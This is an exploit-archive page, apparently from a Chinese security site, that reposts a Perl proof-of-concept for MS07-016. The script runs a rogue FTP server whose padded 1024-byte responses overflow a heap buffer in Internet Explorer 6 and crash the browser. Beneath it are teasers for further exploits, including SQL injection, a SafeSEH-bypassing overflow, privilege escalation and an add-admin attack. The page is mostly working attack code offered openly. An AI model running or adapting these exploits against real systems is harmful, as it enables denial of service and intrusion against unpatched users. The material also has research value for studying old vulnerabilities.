MS Internet Explorer (FTP Server Response) DoS Exploit

所属分类: 网络安全 / Exploit 阅读数: 125
收藏 0 赞 0 分享
#!/usr/bin/perl

# MS 07-016 FTP Server Response PoC
# Usage: ./ms07016ftp.pl [LISTEN_IP]
#
# Tested Against: MSIE 6.02900.2180 (SP2)
#
# Details: The response is broken into buffers, either at length 1024,
# or at '\r\n'. Each buffer is apended with \x00, without
# bounds checking. If the response is exctly 1024 characters
# in length, you will overflow the heap with the string \x00.


use IO::Socket;
use strict;

# Create listener
my $ip=shift || '127.0.0.1';
my $sock = IO::Socket::INET->new(Listen=>1,
LocalHost=>$ip,
LocalPort=>'21',
Proto=>'tcp');
$sock or die ("Could not create listener.\nMake sure no FTP server is running, and you are running this as root.\n");

# Wait for initial connection and send banner
my $sock_in = $sock->accept();
print $sock_in "220 waa waa wee waa\r\n";

# Send response code with total lenght of response = 1024
while (<$sock_in>){
my $response;
if($_ eq "USER") { $response="331 ";}
elsif($_ eq "PASS") { $response="230 ";}
elsif($_ eq "syst") { $response="215 ";}
elsif($_ eq "CWD") { $response="250 ";}
elsif($_ eq "PWD") { $response="230 ";}
else { $response="200 ";}
print $sock_in $response."A"x(1024-length($response)-2)."\r\n";
}
close($sock);
//http://www.heibai.net
更多精彩内容其他人还在看

VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - Orange Bat advisory - Name : VMWare Workstation (hcmon.sys 6.0.0.45731)
收藏 0 赞 0 分享

webEdition CMS (we_objectID) Blind SQL Injection Exploit

<?php ini_set("max_execution_time",0); print_r(' ############################################################### #
收藏 0 赞 0 分享

FlashGet 1.9.0.1012 (FTP PWD Response) BOF Exploit (safeseh)

#!/usr/bin/perl # k`sOSe 08/17/2008 # bypass safeseh using flash9f.ocx. use warnings; use strict; use IO::Socket; # win32_ex
收藏 0 赞 0 分享

WS_FTP Home/Professional FTP Client Remote Format String PoC

################################################################################################################## # # Ipswitch WS_FTP
收藏 0 赞 0 分享

EO Video 1.36 Local Heap Overflow DOS / PoC

#!/usr/bin/python # -------------------------------------------------------------- # EO Video v1.36 Heap Overflow local PoC/DoS exploi
收藏 0 赞 0 分享

ESET Smart Security 3.0.667.0 Privilege Escalation PoC

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - Orange Bat advisory - Name : ESET Smart Security 3.0.667.0 Class
收藏 0 赞 0 分享

BurnAware NMSDVDXU ActiveX Remote Arbitrary File Creation/Execution

----------------------------------------------------------------------------- BurnAware NMSDVDXU ActiveX Control Remote Arbitrary File Cr
收藏 0 赞 0 分享

iGaming CMS

#!/usr/bin/perl # ---------------------------------------------------------- # iGaming <= 1.5 Multiple Remote SQL Injection Exploit
收藏 0 赞 0 分享

Rianxosencabos CMS 0.9 Remote Add Admin Exploit

#!/usr/bin/perl -w # Rianxosencabos CMS 0.9 Remote Add Admin Exploit # Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz
收藏 0 赞 0 分享

CJ Ultra Plus

#!/usr/bin/perl # # CJ Ultra Plus <= v1.0.4 Cookie SQL Injection # # found and coded by -SmoG- /GermAn hAckZ0r # contact: ICQ
收藏 0 赞 0 分享
查看更多